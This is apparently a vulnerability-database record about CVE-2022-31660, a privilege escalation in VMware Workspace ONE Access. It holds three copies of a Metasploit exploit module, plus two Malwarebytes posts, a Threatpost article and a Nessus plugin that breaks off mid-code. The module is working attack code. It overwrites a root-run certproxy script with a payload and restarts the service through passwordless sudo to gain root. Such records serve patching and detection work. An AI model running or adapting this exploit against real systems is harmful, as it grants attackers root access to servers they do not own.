Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. 
This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": 
"https://0day.today/exploit/37891", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:25", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T16:13:28", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-31660", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2023-04-04T09:24:09", "id": "MSF:EXPLOIT-LINUX-LOCAL-VMWARE_WORKSPACE_ONE_ACCESS_CERTPROXY_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = 
GreatRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. 
This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-08-04T16:04:42", "description": "", "cvss3": {}, "published": "2022-08-04T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-04T00:00:00", "id": "PACKETSTORM:167973", "href": "https://packetstormsecurity.com/files/167973/VMware-Workspace-ONE-Access-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Unix \n \nTARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'VMware Workspace ONE Access CVE-2022-31660', \n'Description' => %q{ \nVMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges \nto those of the root user by modifying a file and then restarting the vmware-certproxy service which \ninvokes it. The service control is permitted via the sudo configuration without a password. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Spencer McIntyre' \n], \n'Platform' => [ 'linux', 'unix' ], \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Targets' => [ \n[ 'Automatic', {} ], \n], \n'DefaultOptions' => { \n'PrependFork' => true, \n'MeterpreterTryToFork' => true \n}, \n'Privileged' => true, \n'DefaultTarget' => 0, \n'References' => [ \n[ 'CVE', '2022-31660' ], \n[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] \n], \n'DisclosureDate' => '2022-08-02', \n'Notes' => { \n# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service \n# is disabled by default though. \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK] \n} \n} \n) \n) \nend \n \ndef certproxy_service \n# this script's location depends on the version, so find it. \nreturn @certproxy_service if @certproxy_service \n \n@certproxy_service = [ \n'/usr/local/horizon/scripts/certproxyService.sh', \n'/opt/vmware/certproxy/bin/certproxyService.sh' \n].find { |path| file?(path) } \n \nvprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service \n@certproxy_service \nend \n \ndef sudo(arguments) \ncmd_exec(\"sudo --non-interactive #{arguments}\") \nend \n \ndef check \nunless whoami == 'horizon' \nreturn CheckCode::Safe('Not running as the horizon user.') \nend \n \ntoken = Rex::Text.rand_text_alpha(10) \nunless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token) \nreturn CheckCode::Safe('Cannot invoke the service control script with sudo.') \nend \n \nunless writable?(TARGET_FILE) \nreturn CheckCode::Safe('Cannot write to the service file.') \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# backup the original permissions and contents \nprint_status('Backing up the original file...') \n@backup = { \nstat: stat(TARGET_FILE), \ncontents: 
read_file(TARGET_FILE) \n} \n \nif payload.arch.first == ARCH_CMD \npayload_data = \"#!/bin/bash\\n#{payload.encoded}\" \nelse \npayload_data = generate_payload_exe \nend \nupload_and_chmodx(TARGET_FILE, payload_data) \nprint_status('Triggering the payload...') \nsudo(\"--background #{certproxy_service} restart\") \nend \n \ndef cleanup \nreturn unless @backup \n \nprint_status('Restoring file contents...') \nfile_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it \nwrite_file(TARGET_FILE, @backup[:contents]) \nprint_status('Restoring file permissions...') \nchmod(TARGET_FILE, @backup[:stat].mode & 0o777) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167973/vmware_workspace_one_access_certproxy_lpe.rb.txt"}], "malwarebytes": [{"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. 
A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656, VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>), which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! 
VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. 
(VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656, VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>), which are all local privilege escalation vulnerabilities. 
These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!\n\nThe post [Update now! VMWare patches critical vulnerabilities in several products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! 
VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 is also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, 
said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## **Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affects VMware Workspace ONE Access, Identity Manager and vRealize Automation that\u2019s earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. 
Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the 
danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. \u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-17T16:33:12", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following 
vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:identity_manager", "cpe:/a:vmware:workspace_one_access"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/163939", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163939);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-31656\",\n \"CVE-2022-31657\",\n \"CVE-2022-31658\",\n \"CVE-2022-31659\",\n \"CVE-2022-31660\",\n \"CVE-2022-31661\",\n \"CVE-2022-31662\",\n \"CVE-2022-31663\",\n \"CVE-2022-31664\",\n \"CVE-2022-31665\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0021\");\n script_xref(name:\"IAVA\", value:\"2022-A-0303\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0027\");\n\n script_name(english:\"VMware Workspace One Access / 
VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access\n to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://core.vmware.com/vmsa-2022-0021-questions-answers-faq\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/89096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-160130 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0021 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31656\");\n\n 
